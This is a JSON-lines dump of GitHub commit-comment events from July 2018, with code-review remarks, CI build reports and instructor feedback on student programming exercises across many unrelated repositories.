{"id":"7949498110","type":"CommitCommentEvent","actor":{"login":"nico202"},"repo":{"name":"JuliaPlots/Plots.jl"},"payload":{"comment":{"id":29669685,"position":null,"line":null,"path":null,"commit_id":"e92e832258ad5efd4b04c90c1a7a69ffb470c9f3","created_at":"2018-07-11T11:37:05Z","updated_at":"2018-07-11T11:37:05Z","author_association":"NONE","body":"https://github.com/JuliaLang/Pkg.jl/pull/496\r\n"}},"created_at":"2018-07-11T11:37:05Z"}
{"id":"7949498280","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669686,"position":4,"line":72,"path":"config/sync/core.entity_view_display.taxonomy_term.vih_class.radio_selection.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:37:08Z","updated_at":"2018-07-11T11:37:08Z","author_association":"COLLABORATOR","body":"this field is not exist in vih_class vocabulary for VIH project"}},"created_at":"2018-07-11T11:37:08Z"}
{"id":"7949499266","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29669687,"position":null,"line":null,"path":null,"commit_id":"5ba34041c8c5e88a2d0fb29d7c5bee069082b7cf","created_at":"2018-07-11T11:37:21Z","updated_at":"2018-07-11T11:37:21Z","author_association":"NONE","body":"求めてる通りの結果が得られていますね。OKです。\r\n2点、「これが出来たらより良い」という改良要望です。\r\n・「グー」「チョキ」「パー」の部分だけ差し替えて表示できるように、format()を使ってみましょう。\r\n・数字以外を入れるとエラーでプログラムが終了してしまいます。"}},"created_at":"2018-07-11T11:37:21Z"}
{"id":"7949507409","type":"CommitCommentEvent","actor":{"login":"PavelVais"},"repo":{"name":"PavelVais/RecruitisAPI"},"payload":{"comment":{"id":29669710,"position":null,"line":null,"path":null,"commit_id":"1cb7b14075133d6bb56f9ff7e78b33f93f31c84b","created_at":"2018-07-11T11:39:11Z","updated_at":"2018-07-11T11:39:11Z","author_association":"OWNER","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T11:39:11Z"}
{"id":"7949508766","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29669711,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-11T11:39:27Z","updated_at":"2018-07-11T11:39:27Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2280 of 2310 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 598\n * Failed: 30\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.7%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.94%25-green.png)</a>\n"}},"created_at":"2018-07-11T11:39:27Z"}
{"id":"7949510897","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29669717,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-11T11:39:55Z","updated_at":"2018-07-11T11:39:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T11:39:55Z"}
{"id":"7949511947","type":"CommitCommentEvent","actor":{"login":"koldoiglesias"},"repo":{"name":"koldoiglesias/IpartekPruebas"},"payload":{"comment":{"id":29669722,"position":5,"line":5,"path":"com.ipartek.formacion.ejemplo1/src/com/ipartek/formacion/ejemplo1/Main.java","commit_id":"dcf1d5168015ab62697a37f456a4fe5a909b065d","created_at":"2018-07-11T11:40:11Z","updated_at":"2018-07-11T11:40:11Z","author_association":"OWNER","body":"Me encanta!"}},"created_at":"2018-07-11T11:40:11Z"}
{"id":"7949512373","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"javafxports/openjdk-jfx"},"payload":{"comment":{"id":29669723,"position":103,"line":1094,"path":"modules/graphics/src/main/java/javafx/scene/Parent.java","commit_id":"d66e3d1c3666a7cd0589ff6fbef0dfc39d587c01","created_at":"2018-07-11T11:40:16Z","updated_at":"2018-07-11T11:40:16Z","author_association":"NONE","body":"I think there might be some problems.\r\n\r\nDuring the execution of `layoutChildren()`, `currentLayoutChild` is set to `null`. If the position of a child is changed during the period, the layout is marked dirty (as `isCurrentLayoutChild()` returns `false`), then another layout action will be performed in the next pulse. This behaviour is different from the old one, but it's okay. In the next pulse, the layout no longer changes, so there won't be extra layout actions any more.\r\n\r\nHowever, if the layout of a child is changed more than one time during the execution (e.g. set `layoutY` to `1` first, then set it to `2`), the layout will always be marked dirty, even though the layout remains the same before and after `layoutChildren()` is called. The infinite layout will cause high CPU usage.\r\n\r\nI'm now experiencing such a problem, and I've found two solutions:\r\n1. `isCurrentLayoutChild()` always returns `true` during the execution of `layoutChildren()`. (Let JavaFX handle it.)\r\n2. The user avoids changing layout more than one time in `layoutChildren()`. (Let the user handle it.)\r\n\r\nSo who should handle such a situation?"}},"created_at":"2018-07-11T11:40:16Z"}
{"id":"7949513656","type":"CommitCommentEvent","actor":{"login":"julienrf"},"repo":{"name":"scala-stm/scala-stm"},"payload":{"comment":{"id":29669724,"position":18,"line":52,"path":"src/main/scala/scala/concurrent/stm/TMap.scala","commit_id":"1b454c2f9856e56612644ff15d68de2f4bc75efc","created_at":"2018-07-11T11:40:33Z","updated_at":"2018-07-11T11:40:33Z","author_association":"NONE","body":"I think we should strive for simpler solutions: we don’t need to have a `from` method “shared” between 2.13- and 2.13+ sources. Let’s define it only in 2.13+ (because it is required by `MapFactory`)."}},"created_at":"2018-07-11T11:40:33Z"}
{"id":"7949516491","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29669728,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-11T11:41:12Z","updated_at":"2018-07-11T11:41:12Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T11:41:12Z"}
{"id":"7949517583","type":"CommitCommentEvent","actor":{"login":"tamshum"},"repo":{"name":"nastyalevk/Training-Summer-Express-2018"},"payload":{"comment":{"id":29669732,"position":null,"line":null,"path":null,"commit_id":"50b88f7124d43feee487be9968dfe29526737a63","created_at":"2018-07-11T11:41:27Z","updated_at":"2018-07-11T11:41:27Z","author_association":"NONE","body":"Смотрю код и у меня ощущение, что вас не было на тренинге, когда мы обсуждали все те траблы, которые остались в коде."}},"created_at":"2018-07-11T11:41:27Z"}
{"id":"7949521026","type":"CommitCommentEvent","actor":{"login":"Habrabiggie"},"repo":{"name":"Habrabiggie/Algorithms"},"payload":{"comment":{"id":29669739,"position":null,"line":null,"path":null,"commit_id":"f24f2967283c84613dd3ab4c24b956682715b0d0","created_at":"2018-07-11T11:42:14Z","updated_at":"2018-07-11T11:42:14Z","author_association":"OWNER","body":"Graphs"}},"created_at":"2018-07-11T11:42:14Z"}
{"id":"7949521447","type":"CommitCommentEvent","actor":{"login":"henhentwo"},"repo":{"name":"henhentwo/test1"},"payload":{"comment":{"id":29669741,"position":null,"line":null,"path":null,"commit_id":"9f285f0875ec8de449120c7495bf203ed9c96c83","created_at":"2018-07-11T11:42:20Z","updated_at":"2018-07-11T11:42:20Z","author_association":"OWNER","body":"jjj"}},"created_at":"2018-07-11T11:42:20Z"}
{"id":"7949521959","type":"CommitCommentEvent","actor":{"login":"henhentwo"},"repo":{"name":"henhentwo/test1"},"payload":{"comment":{"id":29669744,"position":null,"line":null,"path":null,"commit_id":"9f285f0875ec8de449120c7495bf203ed9c96c83","created_at":"2018-07-11T11:42:27Z","updated_at":"2018-07-11T11:42:27Z","author_association":"OWNER","body":"hhh"}},"created_at":"2018-07-11T11:42:27Z"}
{"id":"7949525952","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29669754,"position":null,"line":null,"path":null,"commit_id":"4fa7394b56f0ef99326e393bef992f853010f624","created_at":"2018-07-11T11:43:20Z","updated_at":"2018-07-11T11:43:20Z","author_association":"NONE","body":"ディレクトリ変更後のコミットを表示したときにソースが見えなかったので、ここでコメントしますね。\r\n(川上くんがとくに何かすることはありません。)\r\n\r\n求めている挙動になっていますので、正解です。\r\n数字以外の入力にも耐えられていますね。\r\n1点だけ敢えて要望を言うと、「グー」「チョキ」「パー」の部分だけを可変にし、format()メソッドで埋め込むなど出来ればもっと良いかなと思います。"}},"created_at":"2018-07-11T11:43:20Z"}
{"id":"7949529610","type":"CommitCommentEvent","actor":{"login":"zstngr"},"repo":{"name":"dimatveev2003/CPP2018"},"payload":{"comment":{"id":29669764,"position":1,"line":1,"path":"ijn","commit_id":"23051604b61e1a5781c303d6268f76b720f5fa24","created_at":"2018-07-11T11:44:07Z","updated_at":"2018-07-11T11:44:07Z","author_association":"NONE","body":"10/10"}},"created_at":"2018-07-11T11:44:07Z"}
{"id":"7949530022","type":"CommitCommentEvent","actor":{"login":"chapmanb"},"repo":{"name":"chapmanb/cloudbiolinux"},"payload":{"comment":{"id":29669766,"position":18,"line":25,"path":"ggd-recipes/hg19/mirbase.yaml","commit_id":"1c69667805dabd4c9f4cb91bb55b0a347b953739","created_at":"2018-07-11T11:44:12Z","updated_at":"2018-07-11T11:44:12Z","author_association":"OWNER","body":"Paulo -- thanks much for the catching this. I just pushed a fix so if you `rm -rf tmpbcbio-install` and re-run it should pick up the fixed recipe and hopefully work cleanly for you now."}},"created_at":"2018-07-11T11:44:12Z"}
{"id":"7949544783","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29669791,"position":null,"line":null,"path":null,"commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T11:47:32Z","updated_at":"2018-07-11T11:47:32Z","author_association":"MEMBER","body":"@fertapric the sidebar is already too cluttered. :( I don't think we should add more information as it stands right now. :)"}},"created_at":"2018-07-11T11:47:32Z"}
{"id":"7949545486","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29669794,"position":21,"line":21,"path":"spec/bankline_csv_import_file_spec.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T11:47:42Z","updated_at":"2018-07-11T11:47:42Z","author_association":"MEMBER","body":"Haha, yes, it's probably something like that."}},"created_at":"2018-07-11T11:47:42Z"}
{"id":"7949549778","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29669802,"position":null,"line":null,"path":null,"commit_id":"e44f1743364cafa14a5f260a8131fd82dc88fd30","created_at":"2018-07-11T11:48:42Z","updated_at":"2018-07-11T11:48:42Z","author_association":"NONE","body":"求められている動きになっていますね。OKです。\r\n結果のメッセージですが、「グー」「チョキ」「パー」の部分だけをformat()メソッドを使って置き換えられるともう少しいいと思います。(+で連結する形でもいいです)\r\n\r\nまた、変数名の付け方ですが、caseはプログラミングのキーワードでもあるため、なるべくは変数の一部としても使わない方がいいですね。"}},"created_at":"2018-07-11T11:48:42Z"}
{"id":"7949550379","type":"CommitCommentEvent","actor":{"login":"MasseGuillaume"},"repo":{"name":"scala-stm/scala-stm"},"payload":{"comment":{"id":29669804,"position":18,"line":52,"path":"src/main/scala/scala/concurrent/stm/TMap.scala","commit_id":"1b454c2f9856e56612644ff15d68de2f4bc75efc","created_at":"2018-07-11T11:48:51Z","updated_at":"2018-07-11T11:48:51Z","author_association":"NONE","body":"Would you duplicate the code between 2.11 and 2.12?"}},"created_at":"2018-07-11T11:48:51Z"}
{"id":"7949554811","type":"CommitCommentEvent","actor":{"login":"johnsonyep"},"repo":{"name":"confluentinc/confluent-kafka-python"},"payload":{"comment":{"id":29669817,"position":null,"line":null,"path":null,"commit_id":"9c53580c2b71ec58c6ec1bab3ab11f6b0df5a3dd","created_at":"2018-07-11T11:49:50Z","updated_at":"2018-07-11T11:49:50Z","author_association":"NONE","body":"how can I  poll to the topic I set"}},"created_at":"2018-07-11T11:49:50Z"}
{"id":"7949555500","type":"CommitCommentEvent","actor":{"login":"rchl"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669819,"position":69,"line":505,"path":"scripts/controllers/main.js","commit_id":"b6c82947ddab8efcebb68eb9e3e9b70597a371b8","created_at":"2018-07-11T11:49:59Z","updated_at":"2018-07-11T11:49:59Z","author_association":"NONE","body":"Needs check for `item.icons` as in `weatherListImageStyles` to avoid code throwing when `item.icons` is not defined."}},"created_at":"2018-07-11T11:49:59Z"}
{"id":"7949557241","type":"CommitCommentEvent","actor":{"login":"willemt"},"repo":{"name":"willemt/raft"},"payload":{"comment":{"id":29669823,"position":null,"line":null,"path":null,"commit_id":"84ac58a486487d173e1d5cbd7efe421d041e59c2","created_at":"2018-07-11T11:50:22Z","updated_at":"2018-07-11T11:50:22Z","author_association":"OWNER","body":"hi @yossigo \r\n\r\n> it may be a good idea to pass the log entry that created the node so the membership function can extract node info, generate its own udata and set it up.\r\n\r\nYes I 100% agree, this is the right thing to do. If you add entry to the `notify_membership_event` callback I'll merge this in. Otherwise I'll try to get around to it soon."}},"created_at":"2018-07-11T11:50:22Z"}
{"id":"7949557869","type":"CommitCommentEvent","actor":{"login":"tz6618"},"repo":{"name":"sqrthree/vuepress-theme-api"},"payload":{"comment":{"id":29669828,"position":null,"line":null,"path":null,"commit_id":"dccc0a2d70a16fb4f121be4d2b369c1d15fdce62","created_at":"2018-07-11T11:50:31Z","updated_at":"2018-07-11T11:50:31Z","author_association":"NONE","body":"请留下联系方式，或联系我WX：fairexchange"}},"created_at":"2018-07-11T11:50:31Z"}
{"id":"7949560798","type":"CommitCommentEvent","actor":{"login":"jacekokrojek"},"repo":{"name":"rafalszmit/js-pesel-generator"},"payload":{"comment":{"id":29669834,"position":11,"line":3,"path":"app.js","commit_id":"53253fefe7dc0874c632f5e39cac411f6782ca4d","created_at":"2018-07-11T11:51:11Z","updated_at":"2018-07-11T11:51:11Z","author_association":"COLLABORATOR","body":"As stated in https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Strict_mode you should be able to set up strict mode for a entire file."}},"created_at":"2018-07-11T11:51:11Z"}
{"id":"7949562143","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29669842,"position":null,"line":null,"path":null,"commit_id":"b0c6991bcf6f5ae76a28bc697989814146ed1066","created_at":"2018-07-11T11:51:29Z","updated_at":"2018-07-11T11:51:29Z","author_association":"MEMBER","body":"ok, then try to revert those changes, but I do not think that they are causing it ;)"}},"created_at":"2018-07-11T11:51:29Z"}
{"id":"7949562860","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29669844,"position":null,"line":null,"path":null,"commit_id":"e93c7946e92b67428f783c33addb354142cc1d9e","created_at":"2018-07-11T11:51:38Z","updated_at":"2018-07-11T11:51:38Z","author_association":"NONE","body":"課題について\r\n出題意図通りの結果になっています。OKです。\r\n\r\n講義中にも伝えましたが、結果の文章はほぼ一緒なので、「グー」「チョキ」「パー」の部分だけformat()メソッドで置き換える形だともっと良いですね。"}},"created_at":"2018-07-11T11:51:38Z"}
{"id":"7949562888","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29669846,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-11T11:51:38Z","updated_at":"2018-07-11T11:51:38Z","author_association":"CONTRIBUTOR","body":"Also there is little benefit in caching `vendor/` opposed to the race conditions and uselessly eating up persistent storage. With cached Composer cache, `composer install` takes only few seconds top."}},"created_at":"2018-07-11T11:51:38Z"}
{"id":"7949564542","type":"CommitCommentEvent","actor":{"login":"KellyMarcilliat"},"repo":{"name":"RajaaBoulassouak/Night-Writer"},"payload":{"comment":{"id":29669848,"position":null,"line":null,"path":null,"commit_id":"5be5ef228b999872f0bfd7d324176108ee2f3845","created_at":"2018-07-11T11:52:00Z","updated_at":"2018-07-11T11:52:00Z","author_association":"COLLABORATOR","body":"Nice work getting the tests working!  Next step, let's work on braille to English."}},"created_at":"2018-07-11T11:52:00Z"}
{"id":"7949564652","type":"CommitCommentEvent","actor":{"login":"jacekokrojek"},"repo":{"name":"rafalszmit/js-pesel-generator"},"payload":{"comment":{"id":29669849,"position":125,"line":67,"path":"app.js","commit_id":"53253fefe7dc0874c632f5e39cac411f6782ca4d","created_at":"2018-07-11T11:52:01Z","updated_at":"2018-07-11T11:52:01Z","author_association":"COLLABORATOR","body":"What happen if someone enters other value than \"M\" or \"F\""}},"created_at":"2018-07-11T11:52:01Z"}
{"id":"7949566096","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29669853,"position":5,"line":6,"path":"platform.txt","commit_id":"a8ccbd40a421a86c5a5d753c841d82d71c7df46e","created_at":"2018-07-11T11:52:20Z","updated_at":"2018-07-11T11:52:20Z","author_association":"MEMBER","body":"you should run get.py again and it will put it in the proper location"}},"created_at":"2018-07-11T11:52:20Z"}
{"id":"7949567599","type":"CommitCommentEvent","actor":{"login":"rchl"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669858,"position":67,"line":503,"path":"scripts/controllers/main.js","commit_id":"b6c82947ddab8efcebb68eb9e3e9b70597a371b8","created_at":"2018-07-11T11:52:38Z","updated_at":"2018-07-11T11:52:38Z","author_association":"NONE","body":"I think that returning here means that the result of the mapping function must be already in the form:\r\n```\r\n{\r\n  backgroundImage: 'url(\"url\")',\r\n}\r\n```\r\nI would expect instead that the returned value is a URL and then code below constructs the style object."}},"created_at":"2018-07-11T11:52:38Z"}
{"id":"7949572145","type":"CommitCommentEvent","actor":{"login":"rchl"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669875,"position":93,"line":542,"path":"scripts/controllers/main.js","commit_id":"b6c82947ddab8efcebb68eb9e3e9b70597a371b8","created_at":"2018-07-11T11:53:36Z","updated_at":"2018-07-11T11:53:36Z","author_association":"NONE","body":"Same note as above."}},"created_at":"2018-07-11T11:53:36Z"}
{"id":"7949575658","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"NaderNasr/PortalMR"},"payload":{"comment":{"id":29669883,"position":4,"line":3,"path":"database-mongo/index.js","commit_id":"64d98443ca599ff1c2a1af2996aad58882f7347c","created_at":"2018-07-11T11:54:22Z","updated_at":"2018-07-11T11:54:22Z","author_association":"NONE","body":"Hey there, If this comment is important to say why, otherwise delete it, please. "}},"created_at":"2018-07-11T11:54:22Z"}
{"id":"7949578076","type":"CommitCommentEvent","actor":{"login":"zynori"},"repo":{"name":"green-fox-academy/Andras89"},"payload":{"comment":{"id":29669888,"position":null,"line":null,"path":null,"commit_id":"9509bf9c678750330ffdb982bb5a2086bcfa5eea","created_at":"2018-07-11T11:54:53Z","updated_at":"2018-07-11T11:54:53Z","author_association":"NONE","body":"nice <3"}},"created_at":"2018-07-11T11:54:53Z"}
{"id":"7949580731","type":"CommitCommentEvent","actor":{"login":"Evgeny-"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669895,"position":93,"line":542,"path":"scripts/controllers/main.js","commit_id":"b6c82947ddab8efcebb68eb9e3e9b70597a371b8","created_at":"2018-07-11T11:55:29Z","updated_at":"2018-07-11T11:55:29Z","author_association":"COLLABORATOR","body":"No need here"}},"created_at":"2018-07-11T11:55:29Z"}
{"id":"7949581049","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/lugosidomotor"},"payload":{"comment":{"id":29669896,"position":23,"line":23,"path":"week-08/day-05/reddit/src/main/java/com/reddit/reddit/model/Post.java","commit_id":"dd2355bf0eac9b319a0d3b59080ac21e29801f89","created_at":"2018-07-11T11:55:33Z","updated_at":"2018-07-11T11:55:33Z","author_association":"NONE","body":"Yes, it is fine and the local variable date will be removed by garbage-collector, but I would simplify it onto one line\r\n`posted = new Date().toString();`"}},"created_at":"2018-07-11T11:55:33Z"}
{"id":"7949583140","type":"CommitCommentEvent","actor":{"login":"yanmarkman"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29669905,"position":6,"line":112,"path":"drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c","commit_id":"18a89dad5cfad845ba39d3276c55a3733edc2c25","created_at":"2018-07-11T11:56:01Z","updated_at":"2018-07-11T11:56:01Z","author_association":"NONE","body":"The run-time indir setting should depend upon ONLINE cpu because of 2 already mentioned reasons:\r\n- maxcpus may be limited in Uboot as maxcpus=2 (instead of present/possible=4)\r\n- hotplug cpu - currently not supported but will be and especially for power-consumption\r\n\r\nRight now the indir[] initialization/setting is wrong in case of online<present:\r\n   part of RX packets are distributed into non-working cpus and lost or even block the traffic totally.\r\n!!! Unfortunately, the only-change   num_online_cpu() here doesn't help!!!\r\n   ==> obviously there is more than 1 point for change.\r\n\r\nRegarding the ethtool-X-weight:  the ethtool input verification is not good enough for cases like\r\n   ethtool -X eth0     0 0 0 0 0 0 0 0 0 0 0 1 2 3 4\r\nThe MRVL code has additional checker \r\nmvpp2_ethtool_set_rxfh() {\r\n\t/* Check input.\r\n\t * For example, \"weight 0 0 0 0 1\" may have \"4\" inside of indir\r\n\t */\r\n\tfor (i = 0; i < MVPP22_RSS_TABLE_ENTRIES; i++)\r\n\t\tif (indir[i] >= used_hifs)      where used_hifs=num_online_cpus()\r\n\t\t\treturn -EINVAL;\r\n"}},"created_at":"2018-07-11T11:56:01Z"}
{"id":"7949584091","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29669906,"position":null,"line":null,"path":null,"commit_id":"4b5ae6751d15d99dfd772cff6b2b4963a072b69b","created_at":"2018-07-11T11:56:14Z","updated_at":"2018-07-11T11:56:14Z","author_association":"NONE","body":"出題意図にも沿っていてformat()メソッドもしっかり使っていますね。凄くいいコードだと思います。\r\n入力メッセージも適宜改行コードが入ってるのでとっても見やすく仕上がってると思います。\r\n数字以外を入れてもちゃんとエラー処理されるのでOKです。"}},"created_at":"2018-07-11T11:56:14Z"}
{"id":"7949584699","type":"CommitCommentEvent","actor":{"login":"drupol"},"repo":{"name":"ec-europa/europa-demo"},"payload":{"comment":{"id":29669908,"position":null,"line":null,"path":null,"commit_id":"a2596f3a1decb42b8f34ad6d8f8a99ad76d01b17","created_at":"2018-07-11T11:56:21Z","updated_at":"2018-07-11T11:56:21Z","author_association":"MEMBER","body":"Dont forget to update the runner.yml.dist"}},"created_at":"2018-07-11T11:56:21Z"}
{"id":"7949585448","type":"CommitCommentEvent","actor":{"login":"HDVinnie"},"repo":{"name":"Jackett/Jackett"},"payload":{"comment":{"id":29669909,"position":null,"line":null,"path":null,"commit_id":"471d494b3b8b3e4f1133033dcdec621d40baf682","created_at":"2018-07-11T11:56:31Z","updated_at":"2018-07-11T11:56:31Z","author_association":"CONTRIBUTOR","body":"Is this working for anyone?"}},"created_at":"2018-07-11T11:56:31Z"}
{"id":"7949586443","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29669913,"position":null,"line":null,"path":null,"commit_id":"d7c0d065aba99d0c01bed052e7a64fec0ad11b43","created_at":"2018-07-11T11:56:44Z","updated_at":"2018-07-11T11:56:44Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-263](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-263).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-263-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T11:56:44Z"}
{"id":"7949587354","type":"CommitCommentEvent","actor":{"login":"egyBlind"},"repo":{"name":"coursera-dl/edx-dl"},"payload":{"comment":{"id":29669916,"position":null,"line":null,"path":null,"commit_id":"c5140a7a61be1e459f245b9c69c34ab871aab10d","created_at":"2018-07-11T11:56:56Z","updated_at":"2018-07-11T11:56:56Z","author_association":"NONE","body":" i got this error: \r\n\r\nFile \"\\edx-master\\edx_dl\\edx_dl.py\", line 810, in udownload_unit\r\nskip_or_download(res_downloads, headers, args)\r\nFile \"\\edx-master\\edx_dl\\edx_dl.py\", line 769, in skip_or_download\r\nf(url, filename, headers, args)\r\nFile \"\\edx-master\\edx_dl\\edx_dl.py\", line 724, in download_url\r\nraise e\r\nFile \"\\edx-master\\edx_dl\\edx_dl.py\", line 718, in download_url\r\nurlretrieve(url, filename)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 186, in urlretrieve\r\nwith contextlib.closing(urlopen(url, data)) as fp:\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 161, in urlopen\r\nreturn opener.open(url, data, timeout)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 470, in open\r\nresponse = meth(req, response)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 580, in http_response\r\n'http', request, response, code, msg, hdrs)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 508, in error\r\nreturn self._call_chain(*args)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 442, in _call_chain\r\nresult = func(*args)\r\nFile \"C:\\Python3x\\lib\\urllib\\request.py\", line 588, in http_error_default\r\nraise HTTPError(req.full_url, code, msg, hdrs, fp)\r\nurllib.error.HTTPError: HTTP Error 403: Forbidden\r\n\r\n\r\n\r\n  and please any hope to let script support resume download?\r\n  thanks\r\n"}},"created_at":"2018-07-11T11:56:56Z"}
{"id":"7949589359","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/lugosidomotor"},"payload":{"comment":{"id":29669921,"position":17,"line":17,"path":"week-08/day-05/reddit/src/main/java/com/reddit/reddit/model/Post.java","commit_id":"dd2355bf0eac9b319a0d3b59080ac21e29801f89","created_at":"2018-07-11T11:57:21Z","updated_at":"2018-07-11T11:57:21Z","author_association":"NONE","body":"Like a valid SQL operator and 99% sure that you are not able to run the application with this field name. Do you remember my story about a mysterious sql error? It caused by the same reason :) :("}},"created_at":"2018-07-11T11:57:21Z"}
{"id":"7949594321","type":"CommitCommentEvent","actor":{"login":"adl"},"repo":{"name":"jurajmajor/ltl3tela"},"payload":{"comment":{"id":29669925,"position":51,"line":215,"path":"main.cpp","commit_id":"834d848104dc615d4395c78c7b11c096c04547b4","created_at":"2018-07-11T11:58:24Z","updated_at":"2018-07-11T11:58:24Z","author_association":"NONE","body":"Suggestion: add\r\n```c++\r\nltl2tgba.set_type(spot::postprocessor::Generic);\r\n```\r\nso that the translator is free to use any kind of acceptance condition (the equivalent of `ltl2tgba -G`) and not just generalized Büchi."}},"created_at":"2018-07-11T11:58:24Z"}
{"id":"7949597049","type":"CommitCommentEvent","actor":{"login":"StefanScherer"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29669931,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-11T11:58:58Z","updated_at":"2018-07-11T11:58:58Z","author_association":"CONTRIBUTOR","body":"When missing Ubuntu 18.04 is a problem we could adjust Travis build to use a Docker based build. There you can have builds `FROM ubuntu:18.04` with Ubuntu Bionic."}},"created_at":"2018-07-11T11:58:58Z"}
